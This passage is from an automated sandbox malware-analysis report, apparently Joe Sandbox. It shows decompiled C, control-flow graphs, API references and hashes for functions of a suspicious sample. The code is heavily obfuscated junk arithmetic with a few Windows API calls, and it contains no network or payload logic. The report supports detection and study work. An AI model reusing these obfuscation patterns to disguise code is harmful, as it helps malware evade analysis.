                                              • lstrlenA.KERNEL32(Unknown HTTP error), ref: 00EC8511
                                              • GetSystemDefaultLangID.KERNEL32 ref: 00EC89D0
                                              • SetLastError.KERNEL32(00000563), ref: 00EC89E1
                                              • GetLastError.KERNEL32 ref: 00EC8A0B
                                              • InterlockedIncrement.KERNEL32(?), ref: 00EC8A51
                                              • GetLastError.KERNEL32 ref: 00EC8A53
                                              • _memset.LIBCMT ref: 00EC8A84
                                              • GetCurrentDirectoryW.KERNEL32(00000400,?), ref: 00EC8A98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: ErrorLast$CurrentDefaultDirectoryIncrementInterlockedLangSystem_memsetlstrlen
                                              • String ID: %GR$@$A$H$Unknown HTTP error
                                              • API String ID: 3735698185-4072479422
                                              • Opcode ID: 1a0a4e099cc757eaf62b98606512457c9255cd9c2bc0ecb710bed092fe05e029
                                              • Instruction ID: b5d176175804ae8f6ee456c305fd6e7d4ad314c3dbdf0f4b1152b465dba726a8
                                              • Opcode Fuzzy Hash: 1a0a4e099cc757eaf62b98606512457c9255cd9c2bc0ecb710bed092fe05e029
                                              • Instruction Fuzzy Hash: 0E728B749043598FCB25CFA8D690BADBBB2FF58344F14806AE489A734DDB3A5942CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC7BB0 Relevance: 4.1, Strings: 3, Instructions: 384COMMONCrypto
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 925 ec7bb0-ec7dbb 931 ec7dbd 925->931 932 ec7e21-ec7e27 925->932 933 ec7dbf-ec7dc1 931->933 934 ec7dc3-ec7dc8 931->934 935 ec7e38 932->935 936 ec7e29-ec7e2f 932->936 933->932 933->934 937 ec7dd0-ec7df6 934->937 939 ec7e3a-ec7e40 935->939 936->935 938 ec7e31-ec7e36 936->938 940 ec7dff 937->940 941 ec7df8-ec7dfd 937->941 938->939 942 ec7e4a-ec7e98 call ecee50 939->942 943 ec7e42-ec7e48 939->943 945 ec7e01-ec7e1d 940->945 941->945 946 ec7e9e-ec7ebc 942->946 943->942 943->946 945->937 950 ec7e1f 945->950 948 ec8088-ec80a4 call ec1000 946->948 949 ec7ec2-ec7eea call ec1700 946->949 957 ec80f9-ec812d 948->957 958 ec80a6-ec80f7 948->958 955 ec7eec-ec7efb 949->955 956 ec7f00-ec7f06 949->956 950->946 955->948 959 ec7f0c-ec7f43 call ecee50 956->959 960 ec7feb-ec7ff4 956->960 961 ec8133 call ec1b90 957->961 958->961 969 ec7f4c 959->969 970 ec7f45-ec7f4a 959->970 962 ec801d-ec8029 960->962 963 ec7ff6-ec801b 960->963 968 ec8138-ec8175 961->968 962->948 966 ec802b-ec8085 962->966 963->948 966->948 971 ec8177-ec81c0 968->971 972 ec81c3-ec81cb 968->972 973 ec7f4e-ec7f61 969->973 970->973 971->972 974 ec7f68 973->974 975 ec7f63-ec7f66 973->975 976 ec7f6a-ec7fd5 974->976 975->976 977 ec7fd7-ec7fdc 976->977 978 ec7fe1-ec7fe6 976->978 977->948 978->948
                                              C-Code - Quality: 87%
                                              			E00EC7BB0() {
				signed int _v5;
				signed int _v11;
				short _v12;
				signed int _v13;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				void* _v32;
				signed short _v36;
				signed short _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v64;
				signed int _v68;
				signed char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed char _v100;
				intOrPtr _v104;
				signed int _v108;
				signed short _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed short _t138;
				signed int _t140;
				signed int _t141;
				signed int _t146;
				signed int _t148;
				signed int _t149;
				signed short _t150;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				signed short _t159;
				signed int _t160;
				void* _t161;
				signed char _t171;
				signed int _t177;
				signed int _t185;
				signed int _t197;
				void* _t200;
				signed int _t206;
				signed short _t216;
				signed int _t222;
				signed int _t226;
				signed int _t228;
				intOrPtr _t231;
				signed char _t232;
				void* _t239;
				signed int _t245;
				signed int _t252;
				signed short _t253;
				signed int _t262;
				void* _t264;
				signed short _t266;
				signed int _t268;
				signed int _t269;
				signed int _t271;
				signed char _t290;
				intOrPtr _t296;
				signed int _t302;
				signed int _t306;
				signed int _t308;
				signed int _t316;
				signed short _t321;
				short _t330;
				void* _t334;
				intOrPtr _t338;

				_t138 =  *0x1000cd0; // 0x0
				_v40 = _t138;
				_v36 =  *0x1000cc0 & 0x0000ffff;
				_v124 = 0x5fb76e2f;
				_v120 = 0xb8fb7;
				_v32 = 0x1a57;
				_t266 =  *0x1000d20; // 0x530e
				_v24 = 0xfffff47f;
				_t140 =  *0x1000c90; // 0xffff571c
				_v64 = 0x63400622;
				_v12 = 0x8bb0;
				_t222 =  *0x1000c84; // 0x20
				_v40 = _t266;
				_v13 = _t222;
				_v11 = 0x2f;
				_v92 = 0x5c85;
				asm("cdq");
				_v88 = 0;
				_v11 = 0x5d;
				_v108 = _t140;
				_t141 =  *0x1000c94; // 0x0
				_v104 = _t266;
				_v56 = _t141;
				_v84 = 0x5a;
				_v80 = 0;
				_v11 = _t222;
				_v28 = 0x8c;
				_v76 = 0xc46d32ea;
				_v72 = 0x54623;
				asm("cdq");
				_v116 =  *0x1000cd8;
				_v112 = 0x8c;
				_t268 =  *0x1000cd4; // 0x0
				_v13 =  *0x1000d18 & 0x000000ff;
				_v100 = 0x86475ed1;
				_v96 = 0;
				_v13 = _t222;
				_v11 =  *0x1000ca0 & 0x000000ff;
				_v11 = _t268;
				_t269 =  *0x1000cdc; // 0x84521e70
				_v64 = 0x89737030;
				_v52 = 8;
				_v64 = 0xa0dca2fe;
				_v28 = 0xfffff2ce;
				_v28 =  *0x1000ce0 & 0x0000ffff;
				_v68 = _t269;
				_v64 = 0;
				_v5 =  *0x1000c83 & 0x000000ff;
				_t146 =  *0x1000ce8 & 0x0000ffff;
				_v52 =  *0x1000c9b & 0x000000ff;
				_t226 =  *0x1000cb8 & 0x000000ff;
				_v48 = 0x25092ced;
				_v11 = 0x81;
				asm("cdq");
				_v20 = 0x61cc81d;
				_v68 = _t146;
				_v64 = _t269;
				_pop(ds);
				asm("cdq");
				 *_t146 =  *_t146 + _t146;
				_v20 = 0x991f;
				_t271 =  *0x1000d10; // 0x0
				_v20 = 0xc19c;
				_t148 =  *0x1000d14; // 0x0
				_v5 = _t226;
				_v68 = _t271;
				_v64 = _t148;
				_t149 =  *0x1000c9b & 0x000000ff;
				_v44 =  *0x1215420;
				_t228 = _v84;
				asm("cdq");
				_t334 = _t271 - _v80;
				if(_t334 > 0 || _t334 >= 0 && _t149 >= _t228) {
					__eflags =  *0x1000cd2; // -114
					if(__eflags == 0) {
						L18:
						_t150 = 0;
						__eflags = 0;
					} else {
						__eflags = _v68 | _v64;
						if((_v68 | _v64) == 0) {
							goto L18;
						} else {
							_t150 = 1;
						}
					}
					__eflags = _t150 -  *0x1000d00; // 0xfffff835
					if(__eflags != 0) {
						L21:
						_t231 =  *0x1000d1c; // 0x0
						_t232 =  *0x1000d18; // 0x0
						asm("cdq");
						_t153 = E00ECEE50( *0x1000cd2, _t271, _t232, _t231);
						_t154 =  *0x1000d00; // 0xfffff835
						_t155 = _t154 * 0x5305;
						__eflags = _t155;
						_v84 = _v56 +  *0x1000c9f ^ _t153;
						_v80 = 0 ^ _t271;
						 *0x1000ce8 = 0xfca1;
						 *0x1000cf8 = _t155;
					} else {
						__eflags = 0 -  *0x1000d04; // 0xffffffff
						if(__eflags != 0) {
							goto L21;
						}
					}
				} else {
					_t264 = 0x1b7;
					do {
						 *0x1000d18 = _v100;
						 *0x1000d1c = _v96;
						_v64 = 0;
						if(( !( *0x1000cd0) & _v24) != 0) {
							_t216 = 0;
							__eflags = 0;
						} else {
							_t216 = 1;
						}
						_t321 =  *0x1000ce8; // 0x4
						_v12 = _t321 - _t216 -  *0x1000ca8;
						_v76 = _v76 + 1;
						asm("adc [ebp-0x44], ebx");
						_t264 = _t264 - 1;
					} while (_t264 != 0);
				}
				_v64 = _v44 + 0x2cf;
				_v56 = _v44 + 0xb5;
				_t338 =  *0x1000ca4; // 0x9b27
				if(_t338 != 0) {
					_t330 = E00EC1700();
					 *0x1000d20 = _t330;
					if((0 | _t330 > 0x00000000) >= (0 | _t330 - 0x0000003b > 0x00000000)) {
						__eflags = _v92 | _v88;
						if((_v92 | _v88) == 0) {
							_t185 = M01000CB0; // 0x0
							__eflags =  !_t185;
							if( !_t185 == 0) {
								_t245 =  *0x1000ca8; // 0x7b8b5249
								__eflags = _t245 |  *0x1000cac;
								if((_t245 |  *0x1000cac) != 0) {
									_t296 =  *0x1000ca4; // 0x9b27
									_v11 = _t296 + 0xcdb66aad;
									_v5 = (_v5 & 0x000000ff) +  *0x11a1ed4;
									asm("cdq");
									asm("adc edx, 0xfff8d80f");
									 *0x1000ca8 =  *0x1000ca8 + ( *0x1000c9b & 0x000000ff) + 0x881594e0;
									asm("adc [0x1000cac], edx");
									_v20 = (_v20 & 0x0000ffff) - (_v20 & 0x0000ffff) - (_v36 & 0x0000ffff);
									_t302 = _v124 + 0x4d;
									__eflags = _t302;
									_v11 = _t302;
								}
							} else {
								 *0x1000cd2 =  !(_v20 & 0x0000ffff);
								_v28 = _v116 + (_v28 & 0x0000ffff) + 0x44d8;
							}
						} else {
							_t306 = _v32;
							_t252 =  *0x1000ca8; // 0x7b8b5249
							_v20 = _t306 - 0x3c226021;
							_t197 =  *0x1000cac; // 0x106b42
							 *0x1000ca8 = E00ECEE50(_t252, _t197, _t252, _t197);
							 *0x1000cac = _t306;
							_v120 = 0;
							__eflags =  *0x1000cdc; // 0x84521e70
							if(__eflags != 0) {
								_t253 = 0;
								__eflags = 0;
							} else {
								_t253 = 1;
							}
							_t308 =  *0x1000c9e + ( *0x1000c9b & 0x000000ff);
							__eflags = _t308;
							_v120 = 0;
							if(_t308 != 0) {
								_t200 = 0;
								__eflags = 0;
							} else {
								_t200 = _t308 + 1;
							}
							asm("sbb eax, eax");
							 *0x1000cf8 =  !(( !(_v108 ^  *0x1000ca8) + _t200) * _t253);
							_t90 =  &_v48; // 0x25092ced
							_t316 =  !_v5;
							asm("cdq");
							_t206 =  *0x1000c94; // 0x0
							asm("sbb esi, edx");
							asm("cdq");
							asm("adc esi, edx");
							asm("adc esi, ebx");
							__eflags = ( *_t90 + _t206) * _t206 -  !(( ~_v52 + 1) * _t316) + ( *0x1000d08 &  *0x1000cb8) + 1;
							if(( *_t90 + _t206) * _t206 -  !(( ~_v52 + 1) * _t316) + ( *0x1000d08 &  *0x1000cb8) + 1 != 0) {
								_v5 = 0;
							} else {
								_v5 = 1;
							}
						}
					} else {
						_t262 =  *0x1000ca8; // 0x7b8b5249
						_v52 = _t262 + 0xa52391aa;
					}
				}
				_v44 = _v44 + 0x357;
				_v52 = E00EC1000() & 0x000000ff;
				if(_v52 == 0) {
					_v11 =  *0x1215420;
					_t159 =  *0x1000ce8; // 0x4
					_t160 =  *0x1000cc0; // 0xffff970a
					 *0x1000ce8 = (_t159 - _v84) * _t159;
					_v48 = _v48 + _t160;
					 *0x1000d00 =  *0x1000d00 + 1;
					asm("adc [0x1000d04], ebx"); // executed
				} else {
					_t177 =  *0x1000cc0; // 0xffff970a
					asm("adc edx, 0xb251e");
					 *0x1000ca8 = _v76 + 0xb71e1f5f;
					 *0x1000cac = _v72;
					_v24 = _t177 << 7;
					 *0x1000ca4 = ( *0x1000cec & 0x0000ffff) - 0x55;
					 *0x1000cd8 =  *0x1000c9a *  *0x1000cd8;
				}
				_t161 = E00EC1B90(); // executed
				_t239 = _t161 + 0x78c - (_v44 + _v56 | _v56 + _v64);
				if((0 | (_v24 & 0x0000ffff) - (_v40 & 0xffff) < 0x00000000) < (0 | _v24 - 0x00000037 < 0x00000000)) {
					_v56 =  *0x1000d08 +  *0x1000cc0;
					_t171 =  *0x1000ca0; // 0x5247
					 *0x1000ca0 = _v76 + _t171 + _t171;
					_v64 =  *0x1000d08 - 0x1b;
					_t290 = _v13;
					asm("cdq");
					M01000CB0 = 0x7c;
					_v76 = (_t290 & 0x000000ff) * 0x1d;
					_v72 = _t290;
				}
				return _t239;
			}














































































                                              0x00ec7bb9
                                              0x00ec7bc6
                                              0x00ec7bca
                                              0x00ec7bce
                                              0x00ec7bd5
                                              0x00ec7be1
                                              0x00ec7be5
                                              0x00ec7bf1
                                              0x00ec7bf5
                                              0x00ec7bfa
                                              0x00ec7c06
                                              0x00ec7c0a
                                              0x00ec7c10
                                              0x00ec7c14
                                              0x00ec7c17
                                              0x00ec7c1b
                                              0x00ec7c22
                                              0x00ec7c25
                                              0x00ec7c28
                                              0x00ec7c2c
                                              0x00ec7c2f
                                              0x00ec7c34
                                              0x00ec7c37
                                              0x00ec7c41
                                              0x00ec7c48
                                              0x00ec7c4b
                                              0x00ec7c53
                                              0x00ec7c57
                                              0x00ec7c5e
                                              0x00ec7c65
                                              0x00ec7c66
                                              0x00ec7c70
                                              0x00ec7c73
                                              0x00ec7c79
                                              0x00ec7c7c
                                              0x00ec7c83
                                              0x00ec7c86
                                              0x00ec7c90
                                              0x00ec7c9a
                                              0x00ec7c9d
                                              0x00ec7ca3
                                              0x00ec7caa
                                              0x00ec7cb1
                                              0x00ec7cbd
                                              0x00ec7cc8
                                              0x00ec7cd3
                                              0x00ec7cd6
                                              0x00ec7cd9
                                              0x00ec7cdc
                                              0x00ec7ce3
                                              0x00ec7ce6
                                              0x00ec7ced
                                              0x00ec7cf4
                                              0x00ec7cf8
                                              0x00ec7cf9
                                              0x00ec7d00
                                              0x00ec7d03
                                              0x00ec7d07
                                              0x00ec7d08
                                              0x00ec7d09
                                              0x00ec7d0b
                                              0x00ec7d0f
                                              0x00ec7d1a
                                              0x00ec7d1e
                                              0x00ec7d23
                                              0x00ec7d26
                                              0x00ec7d29
                                              0x00ec7da4
                                              0x00ec7db1
                                              0x00ec7db4
                                              0x00ec7db7
                                              0x00ec7db8
                                              0x00ec7dbb
                                              0x00ec7e21
                                              0x00ec7e27
                                              0x00ec7e38
                                              0x00ec7e38
                                              0x00ec7e38
                                              0x00ec7e29
                                              0x00ec7e2c
                                              0x00ec7e2f
                                              0x00000000
                                              0x00ec7e31
                                              0x00ec7e31
                                              0x00ec7e31
                                              0x00ec7e2f
                                              0x00ec7e3a
                                              0x00ec7e40
                                              0x00ec7e4a
                                              0x00ec7e5f
                                              0x00ec7e66
                                              0x00ec7e6c
                                              0x00ec7e72
                                              0x00ec7e79
                                              0x00ec7e80
                                              0x00ec7e80
                                              0x00ec7e8b
                                              0x00ec7e8e
                                              0x00ec7e91
                                              0x00ec7e98
                                              0x00ec7e42
                                              0x00ec7e42
                                              0x00ec7e48
                                              0x00000000
                                              0x00000000
                                              0x00ec7e48
                                              0x00ec7dc3
                                              0x00ec7dc3
                                              0x00ec7dd0
                                              0x00ec7dd6
                                              0x00ec7de0
                                              0x00ec7df1
                                              0x00ec7df6
                                              0x00ec7dff
                                              0x00ec7dff
                                              0x00ec7df8
                                              0x00ec7df8
                                              0x00ec7df8
                                              0x00ec7e01
                                              0x00ec7e0f
                                              0x00ec7e13
                                              0x00ec7e17
                                              0x00ec7e1a
                                              0x00ec7e1a
                                              0x00ec7e1f
                                              0x00ec7ea7
                                              0x00ec7eb3
                                              0x00ec7eb6
                                              0x00ec7ebc
                                              0x00ec7ecd
                                              0x00ec7ee1
                                              0x00ec7eea
                                              0x00ec7f03
                                              0x00ec7f06
                                              0x00ec7feb
                                              0x00ec7ff2
                                              0x00ec7ff4
                                              0x00ec801d
                                              0x00ec8023
                                              0x00ec8029
                                              0x00ec802b
                                              0x00ec8037
                                              0x00ec8046
                                              0x00ec8050
                                              0x00ec8056
                                              0x00ec805c
                                              0x00ec8062
                                              0x00ec8078
                                              0x00ec8082
                                              0x00ec8082
                                              0x00ec8085
                                              0x00ec8085
                                              0x00ec7ff6
                                              0x00ec8002
                                              0x00ec8017
                                              0x00ec8017
                                              0x00ec7f0c
                                              0x00ec7f0c
                                              0x00ec7f10
                                              0x00ec7f1e
                                              0x00ec7f21
                                              0x00ec7f2f
                                              0x00ec7f34
                                              0x00ec7f3a
                                              0x00ec7f3d
                                              0x00ec7f43
                                              0x00ec7f4c
                                              0x00ec7f4c
                                              0x00ec7f45
                                              0x00ec7f45
                                              0x00ec7f45
                                              0x00ec7f5c
                                              0x00ec7f5c
                                              0x00ec7f5e
                                              0x00ec7f61
                                              0x00ec7f68
                                              0x00ec7f68
                                              0x00ec7f63
                                              0x00ec7f63
                                              0x00ec7f63
                                              0x00ec7f89
                                              0x00ec7f8f
                                              0x00ec7f99
                                              0x00ec7f9c
                                              0x00ec7fa3
                                              0x00ec7fa6
                                              0x00ec7fbb
                                              0x00ec7fbd
                                              0x00ec7fcc
                                              0x00ec7fd1
                                              0x00ec7fd3
                                              0x00ec7fd5
                                              0x00ec7fe3
                                              0x00ec7fd7
                                              0x00ec7fd9
                                              0x00ec7fd9
                                              0x00ec7fd5
                                              0x00ec7eec
                                              0x00ec7eec
                                              0x00ec7ef8
                                              0x00ec7ef8
                                              0x00ec7eea
                                              0x00ec8091
                                              0x00ec809c
                                              0x00ec80a4
                                              0x00ec80fe
                                              0x00ec8107
                                              0x00ec8117
                                              0x00ec811c
                                              0x00ec8123
                                              0x00ec8126
                                              0x00ec812d
                                              0x00ec80a6
                                              0x00ec80ac
                                              0x00ec80b7
                                              0x00ec80bd
                                              0x00ec80ca
                                              0x00ec80e6
                                              0x00ec80ea
                                              0x00ec80f0
                                              0x00ec80f0
                                              0x00ec8133
                                              0x00ec8155
                                              0x00ec8175
                                              0x00ec8184
                                              0x00ec818a
                                              0x00ec819d
                                              0x00ec81a6
                                              0x00ec81a9
                                              0x00ec81b2
                                              0x00ec81b3
                                              0x00ec81bd
                                              0x00ec81c0
                                              0x00ec81c0
                                              0x00ec81cb

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Z$]$,%
                                              • API String ID: 0-1450976927
                                              • Opcode ID: 49162ae6b30f9c0878b1362ec7257d9bbf8daa1b10b681bccdf13b47a3fdccb1
                                              • Instruction ID: 8b8751cdd6e046a0766ef310579516aef255b8b603841f68f3cbe0e7d91e0f3b
                                              • Opcode Fuzzy Hash: 49162ae6b30f9c0878b1362ec7257d9bbf8daa1b10b681bccdf13b47a3fdccb1
                                              • Instruction Fuzzy Hash: 7EF19B74A0435C8FCB25CFA8E580BADBBB2BF59344F14902EE484A734DDB3A5946CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC9B8A Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 913 ec9b8a-ec9b99 GetEnvironmentStringsW 914 ec9b9f-ec9ba2 913->914 915 ec9b9b-ec9b9e 913->915 916 ec9ba4-ec9ba9 914->916 917 ec9bb2-ec9bbb call ecbfcb 914->917 916->916 918 ec9bab-ec9bb0 916->918 920 ec9bc0-ec9bc5 917->920 918->916 918->917 921 ec9bd4-ec9bdf call ecc0d0 920->921 922 ec9bc7-ec9bd3 FreeEnvironmentStringsW 920->922 921->922
                                              C-Code - Quality: 100%
                                              			E00EC9B8A() {
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t1;
				void* _t5;
				void* _t18;
				WCHAR* _t20;

				_t1 = GetEnvironmentStringsW();
				_t20 = _t1;
				if(_t20 != 0) {
					if( *_t20 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t1 =  &(_t1[1]);
							} while ( *_t1 != 0);
							_t1 =  &(_t1[1]);
						} while ( *_t1 != 0);
					}
					_t13 = _t1 - _t20 + 2;
					_t5 = E00ECBFCB(_t1 - _t20 + 2); // executed
					_t18 = _t5;
					if(_t18 != 0) {
						E00ECC0D0(_t13, _t18, _t20, _t18, _t20, _t13);
					}
					FreeEnvironmentStringsW(_t20);
					return _t18;
				} else {
					return 0;
				}
			}










                                              0x00ec9b8d
                                              0x00ec9b93
                                              0x00ec9b99
                                              0x00ec9ba2
                                              0x00000000
                                              0x00ec9ba4
                                              0x00ec9ba4
                                              0x00ec9ba4
                                              0x00ec9ba5
                                              0x00ec9ba6
                                              0x00ec9bac
                                              0x00ec9bad
                                              0x00ec9ba4
                                              0x00ec9bb7
                                              0x00ec9bbb
                                              0x00ec9bc0
                                              0x00ec9bc5
                                              0x00ec9bd7
                                              0x00ec9bdc
                                              0x00ec9bc8
                                              0x00ec9bd3
                                              0x00ec9b9b
                                              0x00ec9b9e
                                              0x00ec9b9e

                                              APIs
                                              • GetEnvironmentStringsW.KERNEL32(00000000,00EC8F59), ref: 00EC9B8D
                                              • __malloc_crt.LIBCMT ref: 00EC9BBB
                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00EC9BC8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID: EnvironmentStrings$Free__malloc_crt
                                              • String ID:
                                              • API String ID: 237123855-0
                                              • Opcode ID: f6f01a0a8c4d1bdc04b9a293a8bb229bde2ef82ca74c851466c653d4799b8424
                                              • Instruction ID: ba351384c8c5ef66542c59b3cfdd5928b1fdaf2d9b41c0a2bff6e4789e5d83e8
                                              • Opcode Fuzzy Hash: f6f01a0a8c4d1bdc04b9a293a8bb229bde2ef82ca74c851466c653d4799b8424
                                              • Instruction Fuzzy Hash: F4F02E376000207E972036347D4CEB6126DDEC633D312682DF453D3142FE124D8382A4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC8C8C Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 995 ec8c8c-ec8da8 998 ec8dde-ec8df5 995->998 999 ec8daa-ec8dd9 995->999 1000 ec8e08-ec8e0d call ec78c0 call ec7bb0 998->1000 1001 ec8df7-ec8e02 GetACP 998->1001 999->998 1005 ec8e12-ec8e34 1000->1005 1001->1000
                                              C-Code - Quality: 78%
                                              			E00EC8C8C(void* __eax, intOrPtr __ebx, void* __ecx) {
				intOrPtr _t32;
				intOrPtr _t34;
				void* _t55;

				_t34 = __ebx;
				asm("invalid");
				asm("lock push cs");
				 *((intOrPtr*)(_t55 - 0x28)) =  *((intOrPtr*)(_t55 - 0x1c));
				 *((intOrPtr*)(_t55 - 0x90)) =  *((intOrPtr*)(_t55 - 0x28)) + 0x9c;
				 *(_t55 - 0x54) =  *((intOrPtr*)(_t55 - 0x28)) + 0x3c5;
				if( *((intOrPtr*)(_t55 - 0x16)) == 0) {
					 *0x1000c83 =  *0x1000c83 -  *((intOrPtr*)(_t55 - 0x14));
					 *(_t55 - 0x30) =  *((intOrPtr*)(_t55 - 0x22)) +  *(_t55 - 0x30) - 0xf3a2;
					 *(_t55 - 0x30) =  *(_t55 - 0x30) |  *0x11533c8;
					_t32 =  *0x1000c84; // 0x52f68420
					 *0x1000c90 = _t32 + 0xffffffc8;
				}
				 *((intOrPtr*)(_t55 - 0x38)) =  *((intOrPtr*)(_t55 - 0x28)) +  *((intOrPtr*)(_t55 - 0x38));
				_t50 =  *(_t55 - 0x54) ^ 0x00000089;
				if( *(_t55 - 0x54) != ( *(_t55 - 0x54) ^ 0x00000089)) {
					 *0x1000cf0 = GetACP();
					 *0x1000cf4 = _t34; // executed
				}
				E00EC78C0(_t50); // executed
				E00EC7BB0(); // executed
				 *0x1000cb8 =  *0x1000cb8 + ( *0x1000c83 & 0x000000ff) - 0xeacd669;
				asm("adc [0x1000cbc], ebx");
				asm("int3");
				return 0;
			}






                                              0x00ec8c8c
                                              0x00ec8c8e
                                              0x00ec8c93
                                              0x00ec8d85
                                              0x00ec8d91
                                              0x00ec8da0
                                              0x00ec8da8
                                              0x00ec8db1
                                              0x00ec8dcb
                                              0x00ec8dce
                                              0x00ec8dd1
                                              0x00ec8dd9
                                              0x00ec8dd9
                                              0x00ec8de4
                                              0x00ec8ded
                                              0x00ec8df5
                                              0x00ec8dfd
                                              0x00ec8e02
                                              0x00ec8e02
                                              0x00ec8e08
                                              0x00ec8e0d
                                              0x00ec8e1f
                                              0x00ec8e25
                                              0x00ec8e2b
                                              0x00ec8e34

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.423883840.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                              • Associated: 00000000.00000002.423879545.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424170838.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424177261.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.424207782.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_ec0000_5GPueTFF2S.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b3625f8cde5d71adf45b4fbd192a57d28a6eea53af7680c7a6de2db24aafba97
                                              • Instruction ID: b1c719fc0d4246011318d955838c9a85486bb5a65f9471859d26ee9072585135
                                              • Opcode Fuzzy Hash: b3625f8cde5d71adf45b4fbd192a57d28a6eea53af7680c7a6de2db24aafba97
                                              • Instruction Fuzzy Hash: 64218C309042088FCB18CFA8E990FEDBBB1FB48350F14552EE885A724ADB3A1941CB10
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00EC8C7B Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1007 ec8c7b-ec8da8 1011 ec8dde-ec8df5 1007->1011 1012 ec8daa-ec8dd9 1007->1012 1013 ec8e08-ec8e0d call ec78c0 call ec7bb0 1011->1013 1014 ec8df7-ec8e02 GetACP 1011->1014 1012->1011 1018 ec8e12-ec8e34 1013->1018 1014->1013
                                              C-Code - Quality: 82%
                                              			E00EC8C7B(intOrPtr __ebx, void* __ecx) {
				intOrPtr _t30;
				intOrPtr _t32;
				void* _t53;

				_t32 = __ebx;
				asm("lock push cs");
				 *((intOrPtr*)(_t53 - 0x28)) =  *((intOrPtr*)(_t53 - 0x1c));
				 *((intOrPtr*)(_t53 - 0x90)) =  *((intOrPtr*)(_t53 - 0x28)) + 0x9c;
				 *(_t53 - 0x54) =  *((intOrPtr*)(_t53 - 0x28)) + 0x3c5;
				if( *((intOrPtr*)(_t53 - 0x16)) == 0) {
					 *0x1000c83 =  *0x1000c83 -  *((intOrPtr*)(_t53 - 0x14));
					 *(_t53 - 0x30) =  *((intOrPtr*)(_t53 - 0x22)) +  *(_t53 - 0x30) - 0xf3a2;
					 *(_t53 - 0x30) =  *(_t53 - 0x30) |  *0x11533c8;
					_t30 =  *0x1000c84; // 0x52f68420
					 *0x1000c90 = _t30 + 0xffffffc8;
				}
				 *((intOrPtr*)(_t53 - 0x38)) =  *((intOrPtr*)(_t53 - 0x28)) +  *((intOrPtr*)(_t53 - 0x38));
				_t48 =  *(_t53 - 0x54) ^ 0x00000089;
				if( *(_t53 - 0x54) != ( *(_t53 - 0x54) ^ 0x00000089)) {
					 *0x1000cf0 = GetACP();
					 *0x1000cf4 = _t32; // executed
				}
				E00EC78C0(_t48); // executed
				E00EC7BB0(); // executed
				 *0x1000cb8 =  *0x1000cb8 + ( *0x1000c83 & 0x000000ff) - 0xeacd669;
				asm("adc [0x1000cbc], ebx");
